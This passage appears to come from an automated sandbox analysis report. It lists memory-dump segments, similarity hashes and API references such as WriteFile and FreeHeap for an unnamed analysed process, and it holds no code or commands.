                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _free$FreeHeap
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2929853658-0
                                                                                                                                                                                  • Opcode ID: 922215185710865e75b61fb2c3e8f8ac7786f59d324ee2213d6d285352e0c909
                                                                                                                                                                                  • Instruction ID: 97cfc4e3e6a6e9a2815678bac1393e3231ce1cc74cf0df2ba7475d2d4a348b77
                                                                                                                                                                                  • Opcode Fuzzy Hash: 922215185710865e75b61fb2c3e8f8ac7786f59d324ee2213d6d285352e0c909
                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F01272514200E78E20EB99E5CEE1AB3D9AB05710B640819F058D75D2CB36FE808AE8
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C9867E
                                                                                                                                                                                  • __fassign.LIBCMT ref: 00C9869B
                                                                                                                                                                                  • WriteFile.KERNEL32(?,00C83D80,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C986E3
                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00C98723
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000013.00000002.546180901.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                  • Associated: 00000013.00000002.546084376.0000000000C80000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546839461.0000000000CA7000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.546983491.0000000000CB0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547070452.0000000000CB3000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547124415.0000000000CB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547241429.0000000000CB8000.00000004.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547308907.0000000000CB9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.547374773.0000000000CBA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560599112.0000000000E62000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.560846932.0000000000E6D000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561528904.0000000000E86000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561572494.0000000000E8E000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561616999.0000000000E90000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561849150.0000000000EB0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561905525.0000000000EB2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561943838.0000000000EB4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.561982314.0000000000EB8000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562037304.0000000000EBC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562075350.0000000000EC0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562114548.0000000000EC2000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562134849.0000000000EC4000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562170690.0000000000EC6000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562197141.0000000000ECC000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562239391.0000000000ED0000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562311741.0000000000EDA000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.562681002.0000000000F03000.00000040.00020000.sdmp Download File
                                                                                                                                                                                  • Associated: 00000013.00000002.565548193.00000000010D4000.00000020.00020000.sdmp Download File
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileWrite__fassign
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1890089730-0
                                                                                                                                                                                  • Opcode ID: 384cf877b99341181be7ad4348fe09486d5986e750086e4844adfd60e9373610
                                                                                                                                                                                  • Instruction ID: 5353395461bcf0e827c76d2c143e2078555941d2b0daee672b3c4ffd97f00277
                                                                                                                                                                                  • Opcode Fuzzy Hash: 384cf877b99341181be7ad4348fe09486d5986e750086e4844adfd60e9373610
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BD17D75D002589FDF15CFE8C884AEDBBB5FF4A314F284169E855BB241DA30AE4ACB50
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%